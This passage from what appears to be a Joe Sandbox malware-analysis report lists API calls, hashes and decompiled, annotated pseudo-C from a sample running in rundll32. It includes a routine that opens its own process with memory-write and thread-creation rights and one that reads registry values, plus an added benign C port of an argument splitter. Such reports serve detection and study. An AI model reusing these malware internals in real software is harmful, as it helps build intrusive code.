                                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                          • String ID:
                                                          • API String ID: 653387826-0
                                                          • Opcode ID: fdfb32b1a876df9d9ced5c6ed4f9de096bde6a7d38df34f14534b873dfe30805
                                                          • Instruction ID: cf38c7ed732c1df1355a7165051a479af0b08c4eeb6a0cbd3cf9350043692e7c
                                                          • Opcode Fuzzy Hash: fdfb32b1a876df9d9ced5c6ed4f9de096bde6a7d38df34f14534b873dfe30805
                                                          • Instruction Fuzzy Hash: 30018F79200704EFDB209F15DC05D6ABBB9FF85361B114519FA5693250CB30F9059B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 05582317
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 05582327
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,0557AA7A,00000000,?), ref: 05582330
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,055862BC,?,?,00000040,?,?,?,?,?,?,0557AA7A), ref: 0558234E
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,055862BC,?,?,00000040,?,?,?,?,?,?,0557AA7A), ref: 0558235B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3667519916-0
                                                          • Opcode ID: ffc2928f80696a5acb81ea47b348a5ec136a9fdc6a1a427d5228b7b5392f9c7d
                                                          • Instruction ID: cb7f9d1447a61f2e72c08be28441618f62f9bc15dea52be0deaf2a32424073ae
                                                          • Opcode Fuzzy Hash: ffc2928f80696a5acb81ea47b348a5ec136a9fdc6a1a427d5228b7b5392f9c7d
                                                          • Instruction Fuzzy Hash: 62F09A75200704AFEA206B35EC48F26BAA8FF44311F14061AF142A2590CF28E809DE24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05590A3D,?), ref: 05589DA8
                                                          • GetVersion.KERNEL32 ref: 05589DB7
                                                          • GetCurrentProcessId.KERNEL32 ref: 05589DC6
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05589DE3
                                                          • GetLastError.KERNEL32 ref: 05589E02
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: b86d6a04d95efa828cdeb83870e9fbba2618719ce9a272b8d3169095887e020f
                                                          • Instruction ID: 6093e70b304e694135b62f7111a6d5a9be5b9c8d84e5a18ef60603c20b93c4a6
                                                          • Opcode Fuzzy Hash: b86d6a04d95efa828cdeb83870e9fbba2618719ce9a272b8d3169095887e020f
                                                          • Instruction Fuzzy Hash: 76F0B7706A03409FE7209F24A88BB353FB5B704B81F52491BF516D52D0DF799548FB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			/* Decompiled initialisation routine: creates a global event, gates on the
                                                          			   OS version, then opens a handle to its own process with rights that
                                                          			   allow writing memory and creating threads. Comments added for reading. */
                                                          			E00E51DFA(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				long _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          
                                                          				/* Manual-reset (bManualReset = 1), initially non-signalled, unnamed event;
                                                          				   the handle is kept in a global. */
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0xe5a2c4 = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				/* Version gate. GetVersion() packs the major version into the low byte of its
                                                          				   return value; the decompiler renders the test against the whole DWORD.
                                                          				   0x32 = 50 = ERROR_NOT_SUPPORTED. */
                                                          				_t4 = GetVersion();
                                                          				if(_t4 <= 5) {
                                                          					_t5 = 0x32;
                                                          					return _t5;
                                                          				}
                                                          				 *0xe5a2b4 = _t4;
                                                          				_t6 = GetCurrentProcessId();
                                                          				 *0xe5a2b0 = _t6;
                                                          				 *0xe5a2bc = _a4;
                                                          				/* 0x10047A = SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE |
                                                          				   PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION |
                                                          				   PROCESS_CREATE_THREAD, requested on the current process ID. */
                                                          				_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          				 *0xe5a2ac = _t7;
                                                          				if(_t7 == 0) {
                                                          					/* OR-ing with 0xffffffff stores -1, i.e. INVALID_HANDLE_VALUE, as the failure marker. */
                                                          					 *0xe5a2ac =  *0xe5a2ac | 0xffffffff;
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00E5686A,?,?,00000001), ref: 00E51E02
                                                          • GetVersion.KERNEL32(?,00000001), ref: 00E51E11
                                                          • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00E51E20
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00E51E3D
                                                          • GetLastError.KERNEL32(?,00000001), ref: 00E51E5C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                           • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                           • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 9060003e010d52940960c523277d740f4fd090eac2bfd17e2ab150a36288298b
                                                          • Instruction ID: c9646747f15f0aa7bcb39f56476db9dbd5be9e335d6a2128d043e6a60eeb49ba
                                                          • Opcode Fuzzy Hash: 9060003e010d52940960c523277d740f4fd090eac2bfd17e2ab150a36288298b
                                                          • Instruction Fuzzy Hash: 4BF06D74644301DFD7188F26AC0BB593BA9A704B43F144E29EA0AF51F0DBB1440CCF16
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 47%
                                                          			E00E538DA(char* _a4, char _a8) {
                                                          				char* _t7;
                                                          				char* _t11;
                                                          				char* _t14;
                                                          				char* _t16;
                                                          				char* _t17;
                                                          				char _t18;
                                                          				signed int _t20;
                                                          				signed int _t22;
                                                          
                                                           				_t16 = _a4;
                                                           				_push(0x20);
                                                           				_t20 = 1;
                                                           				_push(_t16);
                                                           				while(1) {
                                                           					// pass 1: count ' ' separators; _t20 = spaces + 1 is an upper bound on the token count
                                                           					_t7 = StrChrA();
                                                           					if(_t7 == 0) {
                                                           						break;
                                                           					}
                                                           					_t20 = _t20 + 1;
                                                           					_push(0x20);
                                                           					_push( &(_t7[1]));
                                                           				}
                                                           				// one 32-bit pointer slot per token (E00E55FBC is presumably the sample's heap allocator)
                                                           				_t11 = E00E55FBC(_t20 << 2);
                                                           				_a4 = _t11;
                                                           				if(_t11 != 0) {
                                                           					// strip leading/trailing characters from the trim set at 0xe592a4 (contents not shown on this page)
                                                           					StrTrimA(_t16, 0xe592a4);
                                                           					_t22 = 0;
                                                           					do {
                                                           						// pass 2: NUL-terminate the token at the next ' ', then skip any run of ' ' (0x20) or '\t' (9)
                                                           						_t14 = StrChrA(_t16, 0x20);
                                                           						if(_t14 != 0) {
                                                           							 *_t14 = 0;
                                                           							do {
                                                           								_t14 =  &(_t14[1]);
                                                           								_t18 =  *_t14;
                                                           							} while (_t18 == 0x20 || _t18 == 9);
                                                           						}
                                                           						_t17 = _a4;
                                                           						 *(_t17 + _t22 * 4) = _t16;   // argv[_t22] = current token
                                                           						_t22 = _t22 + 1;
                                                           						_t16 = _t14;                 // continue from the next token; 0 after the last one
                                                           					} while (_t14 != 0);
                                                           					_t6 =  &_a8; // 0xe5405e
                                                           					 *( *_t6) = _t17;   // _a8 is an out-parameter: the caller receives the token array
                                                           				}
                                                           				return 0;
                                                           			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,051B962C,?,?,00E5405E,?,051B962C,?,?,00E54540), ref: 00E538F6
                                                          • StrTrimA.SHLWAPI(?,00E592A4,00000002,?,00E5405E,?,051B962C,?,?,00E54540,?,?,?,?,?,00E568F7), ref: 00E53914
                                                          • StrChrA.SHLWAPI(?,00000020,?,00E5405E,?,051B962C,?,?,00E54540,?,?,?,?,?,00E568F7), ref: 00E5391F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                           • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                           • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID: ^@
                                                          • API String ID: 3043112668-2921739345
                                                          • Opcode ID: e715b861280e3d136497d8e974b90d5a3de9a2725aede53beb8bbddd7b320a8f
                                                          • Instruction ID: f3dfe469b2d643aacaffa1fc8aa58d9040d29b5815005f40a1409dc12501433a
                                                          • Opcode Fuzzy Hash: e715b861280e3d136497d8e974b90d5a3de9a2725aede53beb8bbddd7b320a8f
                                                          • Instruction Fuzzy Hash: 1101B1B23003456FE7204A3ACC45FA77B9CEBC9796F042821BD45EB286D6B0CD068660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
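
As an added illustration (editor-written example code, not part of the Joe Sandbox report or of the sample), here is the routine decompiled above as E00E538DA ported to portable C so that its splitting rules can be run against a constructed string. Two assumptions that this page does not confirm: E00E55FBC is treated as a plain heap allocator, and the StrTrimA trim set at 0xe592a4 is taken to be the single space character.

```c
/* Added example: portable C port of the argument splitter decompiled as E00E538DA.
 * Assumptions (not visible in the report): E00E55FBC allocates heap memory, and the
 * StrTrimA trim set at 0xe592a4 is " ". The sample input below is constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for StrTrimA: strip leading/trailing characters from `set`, in place. */
static void trim_in_place(char *s, const char *set) {
    size_t len = strlen(s);
    size_t start = 0;
    while (start < len && strchr(set, s[start]) != NULL) start++;
    size_t end = len;
    while (end > start && strchr(set, s[end - 1]) != NULL) end--;
    memmove(s, s + start, end - start);
    s[end - start] = '\0';
}

/* Split `cmdline` in place the way the sample does:
 *   1. count ' ' characters to size the pointer array (spaces + 1 slots),
 *   2. trim the string,
 *   3. NUL-terminate each token at the next ' ' and skip any following run of ' ' or '\t'.
 * Returns the number of tokens stored in *out (caller frees *out), or -1 on allocation failure.
 * As in the original, the array is sized from the untrimmed space count, so runs of spaces
 * only leave unused slots; an empty input still yields one empty token. */
int split_args(char *cmdline, char ***out) {
    size_t slots = 1;
    for (const char *p = strchr(cmdline, ' '); p != NULL; p = strchr(p + 1, ' '))
        slots++;
    char **argv = calloc(slots, sizeof *argv);
    if (argv == NULL) return -1;

    trim_in_place(cmdline, " ");
    size_t n = 0;
    char *tok = cmdline;
    do {
        char *next = strchr(tok, ' ');
        if (next != NULL) {
            *next = '\0';
            do { next++; } while (*next == ' ' || *next == '\t');
        }
        argv[n++] = tok;
        tok = next;
    } while (tok != NULL);
    *out = argv;
    return (int)n;
}

static char *dup_string(const char *s) {
    size_t len = strlen(s) + 1;
    char *d = malloc(len);
    if (d != NULL) memcpy(d, s, len);
    return d;
}

/* Convenience: split a copy of `s` and return the token count. */
int split_count(const char *s) {
    char *copy = dup_string(s);
    if (copy == NULL) return -1;
    char **argv = NULL;
    int n = split_args(copy, &argv);
    free(argv);
    free(copy);
    return n;
}

/* Convenience: 1 if token `idx` of a split copy of `s` equals `expected`, else 0. */
int split_token_is(const char *s, int idx, const char *expected) {
    char *copy = dup_string(s);
    if (copy == NULL) return 0;
    char **argv = NULL;
    int n = split_args(copy, &argv);
    int ok = (idx >= 0 && idx < n && strcmp(argv[idx], expected) == 0);
    free(argv);
    free(copy);
    return ok;
}

int main(void) {
    char buf[] = "  foo   bar\tbaz qux  ";   /* constructed sample input */
    char **argv = NULL;
    int n = split_args(buf, &argv);
    for (int i = 0; i < n; i++)
        printf("argv[%d] = \"%s\"\n", i, argv[i]);
    free(argv);
    return 0;
}
```

Note that tabs are only skipped when they follow a space separator; a tab between two words ("bar\tbaz" above) is not a separator on its own, which is exactly what the decompiled inner loop shows.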

                                                          C-Code - Quality: 44%
                                                          			E00E56A9F() {
                                                          				char _v8;
                                                          				union _LARGE_INTEGER _v12;
                                                          				intOrPtr _v16;
                                                          				union _LARGE_INTEGER _v20;
                                                          				int _t10;
                                                          
                                                           				QueryPerformanceFrequency( &_v12);
                                                           				_t10 = QueryPerformanceCounter( &_v20);
                                                           				_t3 =  &_v8; // 0xe5494f
                                                           				// _aulldiv(counter, frequency): pushed last-to-first these are counter.Low (_v20), counter.High (_v16),
                                                           				// frequency.Low (_v12) and frequency.High (_v8), i.e. 64-bit ticks / ticks-per-second = elapsed seconds
                                                           				_push( *_t3);
                                                           				_push(_v12.LowPart);
                                                           				_push(_v16);
                                                           				_push(_v20.LowPart);
                                                           				L00E57DD6();
                                                           				// _aulldiv leaves the quotient in edx:eax; "return _t10" (the BOOL from QueryPerformanceCounter)
                                                           				// is a decompiler artifact of the unresolved call, the real return value is the quotient
                                                           				return _t10;
                                                           			}

                                                          APIs
                                                          • QueryPerformanceFrequency.KERNEL32(00000000,?,?,00000000,00E5494F), ref: 00E56AA9
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,00000000,00E5494F), ref: 00E56AB3
                                                          • _aulldiv.NTDLL(00000000,?,?,OI), ref: 00E56AC5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                           • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                           • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterFrequency_aulldiv
                                                          • String ID: OI
                                                          • API String ID: 1936536342-2393818601
                                                          • Opcode ID: cfe5576d79c230f8ff12015ced654f0a06bb1d799729b32e270bc5b7b6d7c6a3
                                                          • Instruction ID: e8d78367863fdd13efe2322d112f91f822e72eff868e98d1b288bd25fd65829e
                                                          • Opcode Fuzzy Hash: cfe5576d79c230f8ff12015ced654f0a06bb1d799729b32e270bc5b7b6d7c6a3
                                                          • Instruction Fuzzy Hash: 5DD0423680020DFBCF01ABE5DD09CDEBB7ABB08205B400990A611A2061D63696689B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05574670
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05574681
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05574699
                                                          • CloseHandle.KERNEL32(?), ref: 055746B3
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055746C8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap$CloseHandle
                                                          • String ID:
                                                          • API String ID: 1910495013-0
                                                          • Opcode ID: a05b1147f87fa3756ad2e9bfc6fdcaeca6a75b6e590cad2dd687100489a21508
                                                          • Instruction ID: 33f292c28ce593d5a87e3078313dd44896bff0e4190c9a67b17752614cedf4dd
                                                          • Opcode Fuzzy Hash: a05b1147f87fa3756ad2e9bfc6fdcaeca6a75b6e590cad2dd687100489a21508
                                                          • Instruction Fuzzy Hash: 5831463020952AEFCB21AF66E988C2EFBAAFF48B103554405F016D7650CB35FCA1DB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?), ref: 05572B50
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • wsprintfA.USER32 ref: 05572B81
                                                            • Part of subcall function 05585FBD: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,05572BA1), ref: 05585FD3
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 05585FFB
                                                            • Part of subcall function 05585FBD: lstrlen.KERNEL32(?), ref: 0558600A
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 0558604A
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 0558607F
                                                            • Part of subcall function 05585FBD: memcpy.NTDLL(00000000,?,?), ref: 0558608C
                                                            • Part of subcall function 05585FBD: memcpy.NTDLL(00000008,055963D8,00000002,00000000,?,?), ref: 055860A1
                                                            • Part of subcall function 05585FBD: wsprintfA.USER32 ref: 055860C4
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 05572BF6
                                                            • Part of subcall function 05593F16: RtlEnterCriticalSection.NTDLL(059BB148), ref: 05593F2C
                                                            • Part of subcall function 05593F16: RtlLeaveCriticalSection.NTDLL(059BB148), ref: 05593F47
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 05572BE0
                                                          • HeapFree.KERNEL32(00000000,?), ref: 05572BEC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                          • String ID:
                                                          • API String ID: 3553201432-0
                                                          • Opcode ID: f36cbef103293f0cbe1a813254b6c927ee8bdf3b7263ee9fbed76be87e30cfb3
                                                          • Instruction ID: 2b4e610a10d4c11aff5da9fa134bbfc21e59a1c2fa58d2c127aa50c1bc26cd3b
                                                          • Opcode Fuzzy Hash: f36cbef103293f0cbe1a813254b6c927ee8bdf3b7263ee9fbed76be87e30cfb3
                                                          • Instruction Fuzzy Hash: 292125B690014AEBCF11DF95ED89C9F7FB9FB88310B010416F905A6110E7799A24EB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0558B466: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 0558B481
                                                            • Part of subcall function 0558B466: LoadLibraryA.KERNEL32(00000000), ref: 0558B4CF
                                                            • Part of subcall function 0558B466: GetProcAddress.KERNEL32(00000000,?), ref: 0558B4E8
                                                            • Part of subcall function 0558B466: RegCloseKey.ADVAPI32(?), ref: 0558B539
                                                          • GetLastError.KERNEL32 ref: 0558F041
                                                          • FreeLibrary.KERNEL32(?), ref: 0558F0A9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 1730969706-0
                                                          • Opcode ID: 0d11455230961b445a60a19382805b82fcb72417bbfc95df08661c2fc9a5a428
                                                          • Instruction ID: 5e4eae41f50e1bfa944d0574a17aeb188f86bce73cb2b7c5d695b4807548e060
                                                          • Opcode Fuzzy Hash: 0d11455230961b445a60a19382805b82fcb72417bbfc95df08661c2fc9a5a428
                                                          • Instruction Fuzzy Hash: EF71D6B5E0020AEFCF10EFE5C8849AEBBBAFF48305B108469E516B7250D735A945CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05586403: lstrlen.KERNEL32(0559B072,059BB184,0559B072,00000000,05591D0C), ref: 0558640C
                                                            • Part of subcall function 05586403: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0558642F
                                                            • Part of subcall function 05586403: memset.NTDLL ref: 0558643E
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,7748D3B0,059BB17C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D043
                                                            • Part of subcall function 0557D01E: StrTrimA.SHLWAPI(00000000,0559847C,00000000,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D062
                                                            • Part of subcall function 0557D01E: StrChrA.SHLWAPI(00000000,05572A10,?,055771D1,05572A10,00000020,059BB17C,?,?,?,?,?,05572A10), ref: 0557D06E
                                                          • GetCurrentThreadId.KERNEL32 ref: 0557878B
                                                          • GetCurrentThread.KERNEL32 ref: 0557879E
                                                          • GetModuleHandleA.KERNEL32(00000000,055963D4,00000000,00000000,?,00000000,?,00000000,00000000,?), ref: 05578825
                                                          • GetShellWindow.USER32 ref: 0557882C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 1517849391-0
                                                          • Opcode ID: 55032be0dcfd2109ad9b1e46075bba9fb2fd45aace2d0183e4d7cd1de960720a
                                                          • Instruction ID: 83ca1b397b786f52fe003878f69221eeb96bce905f55777c56d691aaa7ebb5e2
                                                          • Opcode Fuzzy Hash: 55032be0dcfd2109ad9b1e46075bba9fb2fd45aace2d0183e4d7cd1de960720a
                                                          • Instruction Fuzzy Hash: 4D51907161830AAFD710EF65E88896BB7E9FB84314F014D2EF585A7250DB70E948CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00E52A24(void* __eflags, void* _a4) {
                                                          				intOrPtr _v12;
                                                          				intOrPtr _v16;
                                                          				WCHAR* _v20;
                                                          				char* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v40;
                                                          				char _v44;
                                                          				char _v72;
                                                          				char _v76;
                                                          				char _v80;
                                                          				char _v84;
                                                          				void _v88;
                                                          				char _v92;
                                                          				void* __esi;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t44;
                                                          				int _t48;
                                                          				intOrPtr _t53;
                                                          				void* _t55;
                                                          				void* _t67;
                                                          				void* _t76;
                                                          				WCHAR* _t80;
                                                          				intOrPtr _t82;
                                                          
                                                          				_v92 = 0;
                                                          				memset( &_v88, 0, 0x2c);
                                                          				_v44 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t42 =  *0xe5a2cc; // 0x51b9cd0
                                                          				_t5 = _t42 + 0x48; // 0x51b9e7b
                                                          				_t82 =  *_t5;
                                                          				_t6 = _t42 + 0x4c; // 0x51b9e84
                                                          				_v16 =  *_t6;
                                                          				_t44 =  *0xe5a2d4; // 0x435d5a8
                                                           				_t8 = _t44 + 0xe5bdd0; // 0x410025 = UTF-16LE "%A": first two characters of the environment string that E00E5121E expands via ExpandEnvironmentStringsW
                                                          				_t80 = E00E5121E(_t8);
                                                          				_v20 = _t80;
                                                          				if(_t80 == 0) {
                                                           					_t76 = 8; // Win32 error 8 (ERROR_NOT_ENOUGH_MEMORY), the value every failed-allocation path in this function returns
                                                          					L24:
                                                          					return _t76;
                                                          				}
                                                          				_t48 = lstrlenW(_t80);
                                                          				_t10 =  &_a4; // 0xe5456a
                                                          				if(StrCmpNIW(_t80,  *_t10, _t48) != 0) {
                                                          					_t76 = 1;
                                                          					L22:
                                                          					E00E513CC(_v20);
                                                          					goto L24;
                                                          				}
                                                          				if(E00E5249F(0,  &_a4) != 0) {
                                                          					_a4 = 0;
                                                          				}
                                                          				_t53 = E00E53FC1(_t52,  *0xe5a38c);
                                                          				_v12 = _t53;
                                                          				if(_t53 == 0) {
                                                          					_t76 = 8;
                                                          					goto L19;
                                                          				} else {
                                                          					_t55 = E00E53FC1(_t53, _t82);
                                                          					_t84 = _t55;
                                                          					if(_t55 == 0) {
                                                          						_t76 = 8;
                                                          					} else {
                                                           						_t76 = E00E53B91(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88); // 0x80000001 = HKEY_CURRENT_USER
                                                          						_t55 = E00E513CC(_t84);
                                                          					}
                                                          					if(_t76 != 0) {
                                                          						L17:
                                                          						E00E513CC(_v12);
                                                          						L19:
                                                          						_t83 = _a4;
                                                          						if(_a4 != 0) {
                                                          							E00E5243E(_t83);
                                                          						}
                                                          						goto L22;
                                                          					} else {
                                                          						if(( *0xe5a2b8 & 0x00000001) == 0) {
                                                          							L14:
                                                          							E00E576A8(_v88, _v92, _v92,  *0xe5a2c8, 0);
                                                          							_t76 = E00E55CD8(_v92,  &_v84,  &_v80, 0);
                                                          							if(_t76 == 0) {
                                                          								_v28 = _a4;
                                                          								_v24 =  &_v92;
                                                          								_t76 = E00E54BAC( &_v44, 0);
                                                          							}
                                                          							E00E513CC(_v92);
                                                          							goto L17;
                                                          						}
                                                          						_t67 = E00E53FC1(_t55, _v16);
                                                          						_t86 = _t67;
                                                          						if(_t67 == 0) {
                                                          							_t76 = 8;
                                                          						} else {
                                                          							_t76 = E00E53B91(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
                                                          							E00E513CC(_t86);
                                                          						}
                                                          						if(_t76 != 0) {
                                                          							goto L17;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          				}
                                                          			}

Instruction addresses for the listing above (the interactive view maps each line to its address): 0x00e52a36 to 0x00e52bb0

                                                          APIs
                                                          • memset.NTDLL ref: 00E52A39
                                                            • Part of subcall function 00E5121E: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,051B9E7B,00000000,00E52A6D,00410025,00000001,00000000,74ECC740), ref: 00E5122F
                                                            • Part of subcall function 00E5121E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00E5124C
                                                          • lstrlenW.KERNEL32(00000000,00410025,00000001,00000000,74ECC740), ref: 00E52A7B
                                                          • StrCmpNIW.SHLWAPI(00000000,jE,00000000), ref: 00E52A86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                           • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                           • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                           • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                          • String ID: jE
                                                          • API String ID: 3817122888-3445217829
                                                          • Opcode ID: 3dfa2e89e3a0fb576008b0e12f1f7e8ba2c358b2bb498237dc10372b12baaf13
                                                          • Instruction ID: 8df5fb3d4539d9d3464c3bc52a80bec14c0a942b193c61be47bbd624e8c9d2e6
                                                          • Opcode Fuzzy Hash: 3dfa2e89e3a0fb576008b0e12f1f7e8ba2c358b2bb498237dc10372b12baaf13
                                                          • Instruction Fuzzy Hash: 50417C76900208AFDB11AFE5CC85EEE7BB8AF09356F145829FE00B7121D6719D4C87A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E00E54598(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
